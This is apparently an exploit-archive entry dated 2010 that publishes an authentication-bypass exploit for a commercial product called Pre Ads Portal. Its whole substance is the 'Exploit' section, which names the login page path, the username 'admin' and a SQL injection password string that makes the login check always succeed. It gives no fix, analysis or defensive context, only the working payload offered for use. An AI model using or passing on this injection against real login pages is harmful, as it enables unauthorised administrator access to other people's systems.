id: 14829
date: 11/14/2010
title: Pre Ads Portal SQL Bypass Vulnerability
author: Cru3l.b0y
cves: 

=======================================
Pre Ads Portal SQL Bypass Vulnerability
=======================================

In The Name Of GOD
[+] Exploit Title: PRE ADS PORTAL SQL Bypass Vulnerability
[+] Date: 2010-11-13
[+] Author  : Cru3l.b0y
[+] Software Link: http://www.preproject.com/ads.asp
[+] Price : 125.00$
[+] Contact : Cru3l.b0y@gmail.com
[+] Website : WwW.PenTesters.IR
[+] Greeting: Behzad, Ahmad, ...
 
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[+] Exploit :
 
            go to /signinform.php
            Username : admin
            Password : 1'or'1'='1



#  0day.today [2023-03-23]  #